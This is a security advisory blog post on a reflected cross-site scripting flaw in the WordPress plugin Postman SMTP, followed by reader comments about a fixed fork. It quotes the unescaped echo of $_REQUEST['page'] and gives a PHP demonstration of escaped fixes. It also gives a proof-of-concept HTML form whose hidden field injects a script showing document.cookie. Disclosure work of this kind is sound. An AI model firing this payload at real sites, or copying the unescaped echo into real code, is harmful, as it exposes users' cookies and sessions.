29 Jun 2017

Reflected Cross-Site Scripting (XSS) Vulnerability in Postman SMTP

We recently found that the plugin Postman SMTP contains a reflected cross-site scripting (XSS) vulnerability.

On line 346 of the file /Postman/Postman-Email-Log/PostmanEmailLogController.php, the value of the GET or POST input "page" is output without being escaped:

value="<?php echo $_REQUEST['page'] ?>" />

While the GET input "page" needs to be set to "postman_email_log" for that code to run, the value that is output comes from $_REQUEST, which merges GET and POST (and, depending on PHP's variables_order/request_order settings, cookies as well). With PHP's default request_order of "GP", a POST value for "page" overwrites the GET value of the same name, so the check is made against one array and the output is taken from another: a request can pass the routing check with GET and still have an attacker-controlled POST value reflected into the page.
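The following stand-alone PHP script is an added example, not code from the plugin or the advisory. It reproduces how PHP builds $_REQUEST from GET and POST under request_order, shows that a routing check on $_GET does not protect an echo of $_REQUEST, and places the vulnerable pattern next to two hardened forms. The sample request arrays are constructed; build_request() is a simplified model of PHP's own merge (it ignores cookies and environment); and htmlspecialchars() stands in for WordPress's esc_attr() so the file runs without WordPress.

```php
<?php
// Added example: models the Postman SMTP "page" reflection and its fix.
// Not the plugin's code; build_request() only models the G and P sources.

// Constructed sample request: the URL carries ?page=postman_email_log
// (the value wp-admin routes on), while the POST body carries a payload
// under the same parameter name.
$get  = ['page' => 'postman_email_log'];
$post = ['page' => '"><script>alert(document.cookie);</script>'];

// Mimic how PHP fills $_REQUEST: sources are merged in request_order, so a
// later source overwrites an earlier one on a key clash. The default "GP"
// means POST wins over GET.
function build_request(array $get, array $post, string $request_order = 'GP'): array
{
    $sources = ['G' => $get, 'P' => $post];
    $request = [];
    foreach (str_split($request_order) as $letter) {
        if (isset($sources[$letter])) {
            $request = array_merge($request, $sources[$letter]);
        }
    }
    return $request;
}

// The routing check looks at GET only, as wp-admin's menu handling does.
function is_email_log_page(array $get): bool
{
    return ($get['page'] ?? '') === 'postman_email_log';
}

// Vulnerable pattern (the shape of the plugin's line 346): raw $_REQUEST
// value echoed into an HTML attribute.
function render_vulnerable(array $request): string
{
    return 'value="' . $request['page'] . '" />';
}

// Hardened pattern 1: escape for the HTML attribute context. In WordPress
// use esc_attr(); htmlspecialchars() is used here so this runs stand-alone.
function render_escaped(array $request): string
{
    $safe = htmlspecialchars($request['page'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return 'value="' . $safe . '" />';
}

// Hardened pattern 2: the code path only runs for one page, so emit that
// constant instead of reflecting any request input at all.
function render_constant(): string
{
    return 'value="postman_email_log" />';
}

if (!is_email_log_page($get)) {
    exit("routing check failed; the vulnerable code would not run\n");
}

$request = build_request($get, $post);          // default request_order=GP
echo "page seen by the check (GET):     " . $get['page'] . "\n";
echo "page seen by the echo ($_REQUEST): " . $request['page'] . "\n";
echo "vulnerable: " . render_vulnerable($request) . "\n";
echo "escaped:    " . render_escaped($request) . "\n";
echo "constant:   " . render_constant() . "\n";

// With request_order=PG the GET value wins and this particular PoC fails,
// which is the "depending on the configuration of PHP" caveat.
$request_pg = build_request($get, $post, 'PG');
echo "request_order=PG -> page = " . $request_pg['page'] . "\n";
```

Run it with `php example.php`. The escaped line shows the payload's quotes and angle brackets turned into entities, so the attribute is closed correctly and no script element is created; the constant form removes the reflection entirely and is the smaller change to review.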

The website of the developer is down and we couldn’t find any other method to contact them directly. The plugin was last updated 16 months ago and is only listed as being compatible up to WordPress 4.4, so it doesn’t look like it is being maintained at this time.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in an alert box. At the time of writing, major web browsers other than Firefox provided built-in XSS filtering (Chrome's XSS Auditor and the XSS Filter in Internet Explorer and Edge), so this proof of concept will be blocked in those browsers; Chrome and Edge have since removed those filters. The payload is reflected into a value="..." attribute, so it first closes the attribute and the tag with "> and then injects a script element.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<!-- The GET parameter in the URL satisfies the page check; the hidden POST
     field of the same name is what $_REQUEST['page'] returns under the
     default request_order of "GP". -->
<form action="http://[path to WordPress]/wp-admin/tools.php?page=postman_email_log" method="POST">
<input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>


10 thoughts on “Reflected Cross-Site Scripting (XSS) Vulnerability in Postman SMTP”

  1. Hi,
    Thank you for disclosing this vulnerability. This morning I was able to contact “Postman SMTP” developer, Jason Hendriks –although it was not an easy task ;)–. He was not aware of the fact his plugin had recently been removed from the official WordPress plugins directory. He said he would take a look.

    One more thing, would this be a good fix?
    value=”” />
    (credits to @jasonpomerleau)

  2. Pingback: The High Cost of Free Plugins - Awesome Support

  3. Someone named Yehuda Hassine has uploaded a fixed version in GitHub (https://github.com/yehudah/Postman-SMTP).

    I can see he has modified the following files:
    • /Postman-Auth/PostmanGoogleAuthenticationManager.php
    • /Postman-Auth/PostmanMicrosoftAuthenticationManager.php
    • /Postman-Auth/PostmanYahooAuthenticationManager.php
    • /Postman-Email-Log/PostmanEmailLogController.php
    • /Postman-Email-Log/PostmanEmailLogService.php
    • /PostmanAjaxController.php
    • /PostmanUtils.php

    He has used FILTER_SANITIZE_STRING and intval.

  4. BIG NEWS!

    The fork (fixed version of “Postman SMTP Mailer/Email Log”) by Yehuda Hassine (props to him!) has got approved in the WordPress Directory. Fortunately, in the end, “Postman SMTP Mailer/Email Log” is going to survive, under the name of “Post SMTP Mailer/Email Log”. You can find it in https://wordpress.org/plugins/post-smtp/.

    The Github repo has been moved here: https://github.com/yehudah/Post-SMTP.

    Long life to Post SMTP Mailer/Email Log!

    Thank you @yehudah!
